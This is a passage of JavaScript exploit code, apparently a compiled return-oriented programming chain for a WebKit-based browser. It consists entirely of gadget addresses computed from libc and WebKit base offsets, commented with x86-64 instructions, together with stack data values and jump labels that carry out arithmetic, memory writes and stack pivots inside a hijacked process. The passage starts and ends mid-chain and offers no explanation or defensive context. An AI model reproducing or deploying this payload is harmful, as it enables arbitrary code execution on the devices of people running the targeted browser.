db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3069:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3070:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+190216, //L3072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3072:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+190344, //L3074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190360, //L3075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190328, //L3073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3073:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3075:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190520, //L3079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+190488, //L3077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190504, //L3078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3076:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3077:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3078:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+190576, //L3081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3081:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+190704, //L3083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190720, //L3084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190688, //L3082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3082:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3083:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3084:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190816, //L3086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190800, //L3085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3085:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3086:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3087:
db([48, 0]); // 0x30
set_gadget(libc_base+763368,); //pop rcx
//L3088:
db([48, 0]); // 0x30
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+191040, //L3090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191056, //L3091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191024, //L3089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3091:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+191168, //L3092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191200, //L3094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+191184, //L3093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3092:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+191344, //L3097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+191328, //L3096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3095:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3096:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3097:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+191408, //L3098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3098:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3100:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+191488, //L3102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3102:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+191528, //L3101
//L3011:
libc_base+782311, //pop rsp
ropchain+191544, //L3104
//L3101:
libc_base+782311, //pop rsp
ropchain+185640, //L2957
//L3104:
libc_base+764760, //pop rsi
ropchain+191584, //L3105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3105:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3107:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+191704, //L3110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191688, //L3108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3108:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3110:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+191880, //L3113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191896, //L3114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191848, //L3111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+191864, //L3112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3111:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3112:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3113:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3114:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+192056, //L3118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+192024, //L3116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+192040, //L3117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3115:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3116:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3117:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3118:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+192176, //L3119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192208, //L3121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+192192, //L3120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3119:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3120:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3121:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192312, //L3122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192328, //L3123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3122:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192448, //L3124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192432, //L3125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3125:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+192536, //L3127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+192520, //L3126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3126:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192640, //L3128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192656, //L3129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3128:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3129:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192776, //L3130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192760, //L3131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3131:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3130:
db([0, 0]); // 0x0
//__out_rev:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192848, //L3133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+192912, //L3135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3135:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3136:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3138:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+193080, //L3141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193064, //L3139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3139:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3141:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+193168, //L3142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+193184, //L3144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3142:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3144:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3145:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L3147:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+193344, //L3150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193328, //L3148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3148:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+193520, //L3153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+193536, //L3154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193488, //L3151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+193504, //L3152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3151:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3152:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3153:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3154:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+193632, //L3156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+193616, //L3155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3155:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3156:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3157:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3158:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3159:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+193832, //L3161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3161:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+193888, //L3162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+194024, //L3166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+194008, //L3165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3164:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3166:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+194144, //L3169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+194112, //L3167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3167:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3168:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3169:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+194280, //L3171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194296, //L3172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194264, //L3170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3170:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3172:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+194456, //L3177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194472, //L3178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+194408, //L3174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3174:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3175:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3176:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3177:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3178:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+194584, //L3179+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+194576, //L3179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3179:
db([0, 0]); // 0x0
set_gadgets([
ropchain+194600, //L3179+24
ropchain+195952, //L3173
libc_base+764760, //pop rsi
ropchain+194640, //L3180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3180:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3182:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+194760, //L3185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194744, //L3183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3183:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3185:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+194936, //L3188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194952, //L3189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194904, //L3186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+194920, //L3187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3186:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3187:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3188:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3189:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+195048, //L3191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195032, //L3190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3190:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3192:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3193:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3194:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+195248, //L3196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+195304, //L3197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3197:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+195440, //L3201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+195424, //L3200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3199:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3201:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+195560, //L3204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195528, //L3202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3202:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3204:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+195696, //L3206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+195712, //L3207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+195680, //L3205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3205:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3207:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+195856, //L3210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+195872, //L3211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195824, //L3208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3208:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3209:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3210:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3211:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+195944, //L3212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3212:
db([0, 0]); // 0x0
//L3173:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196072, //L3215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+196088, //L3216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196056, //L3214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3214:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3215:
db([0, 0]); // 0x0
